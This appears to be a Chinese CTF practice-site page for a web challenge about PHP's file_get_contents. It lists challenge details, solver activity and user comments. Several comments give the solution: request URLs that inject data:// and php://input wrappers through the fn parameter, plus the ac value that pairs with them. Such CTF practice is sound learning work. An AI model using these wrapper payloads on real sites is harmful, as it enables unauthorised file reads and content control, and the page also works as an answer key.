file_get_contentsWEB 未解决

分数: 30 金币: 3
题目作者: harry
一  血: npfs
一血奖励: 2金币
解  决: 4109
提  示:
描  述:
file_get_contents????
评论
zengzhijing 2月前

http://117.72.52.127:18565/?fn=data://text/plain,test&ac=test

回复 1

Arya32f 4月前

https://blog.csdn.net/qq_52669977/article/details/143458470

回复 0

Pixelw 4月前

http://117.72.52.127:14185/?ac=bugku&fn=flag.txt

回复 0

nihaozy 4月前

http://117.72.52.127:10268/?ac=example&fn=data://text/plain,example

回复 0

6973lb 4月前

这值4金币?

回复 1

liuguowang75 5月前

/?ac=bugku&fn=flag.txt,想到flag文本了,没想到ac=bugku,哈哈

回复 0

HK1ng 5月前

file_get_contents常用来读文件,但是也可以用伪协议来控制读的内容,这里就是使用data://text/plain,test。指定数据的 MIME 类型位text,然后内容是test,这个时候我们就控制了读取的内容,只需要传参ac位test即可拿到flag。

回复 0

goodsnack 5月前

post ac=1&fn=php://input raw里填1,对应ac的值

回复 0

Zhumeng 9月前

看到file_get_getcontents就要想到伪协议

回复 1

Melancholy 10月前

使用BP POST /?ac=1&fn=php://input HTTP/1.1 参数 1

回复 0

WriteUp

image
harry

3 金币

评分(6)

解题动态

17361232956 攻破了该题 2小时前
liqliq 攻破了该题 7小时前
932041046 攻破了该题 12小时前
2970507147 攻破了该题 13小时前
foxkiller 攻破了该题 1天前
desireart 攻破了该题 1天前
walkerming 攻破了该题 1天前
2757547892 攻破了该题 1天前
zcgzcx1234 攻破了该题 1天前
malx 攻破了该题 2天前
吴王饭差 攻破了该题 2天前
weiyouzhunze 攻破了该题 2天前
1234567nxb 攻破了该题 3天前
waiming 攻破了该题 3天前
lin666 攻破了该题 3天前
泡泡鱼 攻破了该题 4天前
huangyujie 攻破了该题 4天前
爱吃馒头 攻破了该题 4天前
jiumei 攻破了该题 4天前
lebuy 攻破了该题 4天前
问题反馈